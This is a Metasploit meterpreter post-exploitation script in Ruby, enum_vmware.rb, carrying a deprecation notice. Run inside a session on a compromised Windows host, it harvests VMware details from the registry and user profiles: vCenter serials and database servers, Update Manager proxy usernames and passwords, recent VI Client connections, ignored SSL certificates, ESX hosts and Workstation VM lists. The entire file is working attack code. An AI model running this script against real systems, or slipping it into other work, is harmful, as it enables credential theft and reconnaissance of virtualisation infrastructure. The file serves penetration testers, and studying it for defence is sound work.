scripts/meterpreter/enum_vmware.rb
##
# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
# If you'd like to improve this script, please try to port it as a post
# module instead. Thank you.
##
# Author: Carlos Perez at carlos_perez[at]darkoperator.com
#-------------------------------------------------------------------------------
################## Variable Declarations ##################
@client = client
opts = Rex::Parser::Arguments.new(
"-h" => [ false,"Help menu." ]
)
opts.parse(args) { |opt, idx, val|
case opt
when "-h"
print_line("vmware_enum -- Enumerates VMware Configurations for VMware Products")
print_line("USAGE: run vmware_enum")
print_line(opts.usage)
raise Rex::Script::Completed
end
}
def check_prods()
key = @client.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'SOFTWARE\VMware, Inc.', KEY_READ)
sfmsvals = key.enum_key
print_status("The Following Products are installed on this host:")
sfmsvals.each do |p|
print_status("\t#{p}")
end
return sfmsvals
end
def check_vmsoft
installed = false
key = @client.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'SOFTWARE', KEY_READ)
sfmsvals = key.enum_key
if sfmsvals.include?("VMware, Inc.")
print_status("VMware Products are Installed in Host")
installed = true
else
print_error("No VMware Products where found in this Host.")
end
key.close
return installed
end
def enum_vcenter
print_status("Information about Virtual Center:")
vc_dbuser = nil
vc_dbencpass = nil
vc_version = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware VirtualCenter","InstalledVersion")
vc_serial = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware VirtualCenter","Serial")
vc_dbinstance = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware VirtualCenter","DBInstanceName")
vc_dbtype = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware VirtualCenter","DBServerType")
vc_tomcatver = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware VirtualCenter\\Tomcat","Version")
vc_type = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware VirtualCenter","GroupType")
vc_odbcname = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware VirtualCenter\\DB","1")
vc_odbctype = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware VirtualCenter\\DB","4")
# vc_odctrustcon = reg_getvaldata("HKLM\\SOFTWARE\\ODBC\\ODBC.INI\\#{vc_odbcname}","TrustedConnection")
# print_line("*")
# if vc_odctrustcon.to_i != 1
# vc_dbuser = reg_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware VirtualCenter\\DB","2")
# print_line("*")
# vc_dbencpass = reg_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware VirtualCenter\\DB","3")
# print_line("*")
# end
vc_dbname = registry_getvaldata("HKLM\\SOFTWARE\\ODBC\\ODBC.INI\\#{vc_odbcname.chomp}","Database")
vc_dbserver = registry_getvaldata("HKLM\\SOFTWARE\\ODBC\\ODBC.INI\\#{vc_odbcname.chomp}","Server")
print_status("\tVersion: #{vc_version}")
print_status("\tSerial: #{vc_serial}")
print_status("\tvCenter Type: #{vc_type}")
print_status("\tTomcat Version: #{vc_tomcatver}")
print_status("\tDatabase Instance: #{vc_dbinstance}")
print_status("\tDatabase Type: #{vc_dbtype}")
print_status("\tDatabase Name: #{vc_dbname}")
print_status("\tDatabase Server: #{vc_dbserver}")
print_status("\tODBC Name: #{vc_odbcname}")
print_status("\tODBC Type: #{vc_odbctype}")
# if vc_odctrustcon.to_i != 1
# print_status("\tODBC Username: #{vc_dbuser}")
# print_status("\tODBC Password: #{vc_dbencpass}")
# end
end
def enum_viclient
print_status("Information about VMware VI Client:")
vi_pluggins = nil
begin
vi_version = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware Virtual Infrastructure Client\\4.0","InstalledVersion")
vi_pluggins = registry_enumvals("HKLM\\SOFTWARE\\VMware, Inc.\\VMware Virtual Infrastructure Client\\Plugins")
rescue
end
print_status("\tVersion: #{vi_version}")
if vi_pluggins
vi_pluggins.each do |pi|
if pi=~ /Converter/
print_status("\tPlugin: VMware Converter")
elsif pi =~/UM/
print_status("\tPlugin: VMware Update Manager")
else
print_status("\tPlugin: #{pi}")
end
end
end
if not is_system?
recentconns = registry_getvaldata("HKCU\\Software\\VMware\\VMware Infrastructure Client\\Preferences","RecentConnections").split(",")
print_status("Recent VI Client Connections:")
recentconns.each do |c|
print_status("\t#{c}")
end
ignore_ssl = registry_enumkeys("HKCU\\Software\\VMware\\Virtual Infrastructure Client\\Preferences\\UI\\SSLIgnore")
if ignore_ssl.length > 0
print_status("\tIgnored SSL Certs for")
ignore_ssl.each do |issl|
ssl_key = registry_getvaldata("HKCU\\Software\\VMware\\Virtual Infrastructure Client\\Preferences\\UI\\SSLIgnore",issl)
print_status("\tHost: #{issl} SSL Fingerprint: #{ssl_key}")
end
end
else
user_sid = []
key = "HKU\\"
root_key, base_key = @client.sys.registry.splitkey(key)
open_key = @client.sys.registry.open_key(root_key, base_key)
keys = open_key.enum_key
keys.each do |k|
user_sid << k if k =~ /S-1-5-21-\d*-\d*-\d*-\d{3,6}$/
end
user_sid.each do |us|
begin
enumed_user = registry_getvaldata("HKU\\#{us}\\Volatile Environment","USERNAME")
print_status("\tRecent VI Client Connections for #{enumed_user}:")
recentconns = registry_getvaldata("HKU\\#{us}\\Software\\VMware\\VMware Infrastructure Client\\Preferences","RecentConnections").split(",")
recentconns.each do |c|
print_status("\t#{c}")
end
ignore_ssl = registry_enumkeys("HKU\\#{us}\\Software\\VMware\\Virtual Infrastructure Client\\Preferences\\UI\\SSLIgnore")
if ignore_ssl.length > 0
print_status("\tIgnored SSL Certs for #{enumed_user}:")
ignore_ssl.each do |issl|
ssl_key = registry_getvaldata("HCU\\#{us}\\Software\\VMware\\Virtual Infrastructure Client\\Preferences\\UI\\SSLIgnore",issl)
print_status("\tHost: #{issl} SSL Fingerprint: #{ssl_key}")
end
end
rescue
print_status("\tUser appears to have not used the software.")
end
end
end
end
def enum_vum
print_status("Information about VMware Update Manager:")
begin
vum_version = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware Update Manager","InstalledVersion")
vum_server = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware Update Manager","VUMServer")
vum_dbtype = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware Update Manager","DBServerType")
vum_direct2web = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware Update Manager","DirectWebAccess")
vum_useproxy = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware Update Manager","UseProxy")
vum_proxyserver = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware Update Manager","ProxyServer")
vum_proxyport = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware Update Manager","ProxyPort")
vum_proxyuser = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware Update Manager","ProxyUserName")
vum_proxypass = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware Update Manager","ProxyPassword")
vum_vcentersrv = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware Update Manager","VCServer")
vum_vcenterusr = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware Update Manager","VCUserName")
vum_patchstore = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware Update Manager","PatchStore")
vum_odbcname = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware Update Manager\\DB","1")
vum_odbctype = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware Update Manager\\DB","4")
vum_dbname = registry_getvaldata("HKLM\\SOFTWARE\\ODBC\\ODBC.INI\\#{vum_odbcname.chomp}","Database")
vum_dbserver = registry_getvaldata("HKLM\\SOFTWARE\\ODBC\\ODBC.INI\\#{vum_odbcname.chomp}","Server")
# vum_trustedcon = reg_getvaldata("HKLM\\SOFTWARE\\ODBC\\ODBC.INI\\#{vum_odbcname.chomp}","TrustedConnection")
# if vum_trustedcon.to_i != 1
# vum_odbcusename = reg_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware Update Manager\\DB","2")
# vum_odbcpass = reg_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware Update Manager\\DB","3")
# end
print_status("\tVersion: #{vum_version}")
print_status("\tServer: #{vum_server}")
print_status("\tPatch Store: #{vum_patchstore}")
print_status("\tDatabse Type: #{vum_dbtype}")
print_status("\tUses Proxy: #{vum_useproxy}")
print_status("\tProxy User: #{vum_proxyuser}")
print_status("\tProxy Password: #{vum_proxypass}")
print_status("\tVirtual Center: #{vum_vcentersrv}")
print_status("\tVirtual Center User: #{vum_vcenterusr}")
print_status("\tProxy Server: #{vum_proxyserver}:#{vum_proxyport}")
print_status("\tDatabase Name: #{vum_dbname}")
print_status("\tDatabase Server: #{vum_dbserver}")
print_status("\tODBC Name: #{vum_odbcname}")
print_status("\tODBC Type: #{vum_odbctype}")
# print_status("\t ODBC Trusted: #{vum_trustedcon}")
# if vum_trustedcon.to_i != 1
# print_status("\tODBC Username: #{vum_odbcusename}")
# print_status("\tODBC Password: #{vum_odbcpass}")
# end
rescue ::Exception => e
print_status("Error: #{e.class} #{e}")
end
end
def enum_vdm
print_status("Information about VMware VDM Broker:")
vdm_version = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware VDM","ProductVersion")
print_status("\tVersion: #{vdm_version}")
end
def enum_powercli
print_status("Information about PowerCLI:")
pcli_version = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware vSphere PowerCLI","InstalledVersion")
pcli_install_path = registry_getvaldata("HKLM\\SOFTWARE\\VMware, Inc.\\VMware vSphere PowerCLI","InstallPath")
begin
pcli_poweshell_policy = registry_getvaldata("HKLM\\SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\WindowsPowerShell","ExecutionPolicy")
rescue
pcli_poweshell_policy = "Restricted"
end
print_status("\tVersion: #{pcli_version}")
print_status("\tInstalled Pat: #{pcli_install_path}")
print_status("\tPowershell Execution Policy: #{pcli_poweshell_policy}")
end
#Function to enumerate the users if running as SYSTEM
def enum_users
os = @client.sys.config.sysinfo['OS']
users = []
path4users = ""
sysdrv = @client.sys.config.getenv('SystemDrive')
if os =~ /7|Vista|2008/
path4users = sysdrv + "\\users\\"
profilepath = "\\AppData\\Local\\VMware\\"
else
path4users = sysdrv + "\\Documents and Settings\\"
profilepath = "\\Application Data\\VMware\\"
end
if @client.sys.config.is_system?
print_status("Running as SYSTEM extracting user list..")
@client.fs.dir.foreach(path4users) do |u|
userinfo = {}
next if u =~ /^(\.|\.\.|All Users|Default|Default User|Public|desktop.ini|LocalService|NetworkService)$/
userinfo['username'] = u
userinfo['userappdata'] = path4users + u + profilepath
users << userinfo
end
else
userinfo = {}
uservar = @client.sys.config.getenv('USERNAME')
userinfo['username'] = uservar
userinfo['userappdata'] = path4users + uservar + profilepath
users << userinfo
end
return users
end
def enum_vihosupdt
hosts = []
print_status("Information about VMware vSphere Host Update Utility:")
enum_users.each do |u|
print_status("\tESX/ESXi Hosts added for Updates for user #{u['username']}:")
begin
@client.fs.dir.foreach(u['userappdata']+"VIU\\hosts\\") do |vmdir|
next if vmdir =~ /^(\.|\.\.)$/
print_status("\t#{vmdir}")
end
rescue
end
end
end
def enum_vmwarewrk
config = ""
name = ""
print_status("Enumerating VMware Workstation VM's:")
fav_file = ""
enum_users.each do |u|
print_status("\tVM's for user #{u['username']}:")
path = u['userappdata'].gsub(/Local/,"Roaming")
account_file = @client.fs.file.new(path + "\\favorites.vmls", "rb")
until account_file.eof?
fav_file << account_file.read
end
end
fav_file.each_line do |l|
if l =~ /config/
print_status("\tConfiguration File: #{l.scan(/vmlist\d*.config \= (\".*\")/)}")
end
if l =~ /Name/
print_status("\tVM Name: #{l.scan(/vmlist\d*.DisplayName \= (\".*\")/)}")
print_status("")
end
end
end
if client.platform == 'windows'
if check_vmsoft
vmware_products = check_prods()
if vmware_products.include?("VMware VirtualCenter")
enum_vcenter
end
if vmware_products.include?("VMware Virtual Infrastructure Client")
enum_viclient
end
if vmware_products.include?("VMware Update Manager")
enum_vum
end
if vmware_products.include?("VMware VDM")
enum_vdm
end
if vmware_products.include?("VMware vSphere PowerCLI")
enum_powercli
end
if vmware_products.include?("VMware vSphere Host Update Utility 4.0")
enum_vihosupdt
end
if vmware_products.include?("VMware Workstation")
enum_vmwarewrk
end
else
print_status("No VMware Products appear to be installed in this host")
end
else
print_error("This version of Meterpreter is not supported with this Script!")
raise Rex::Script::Completed
end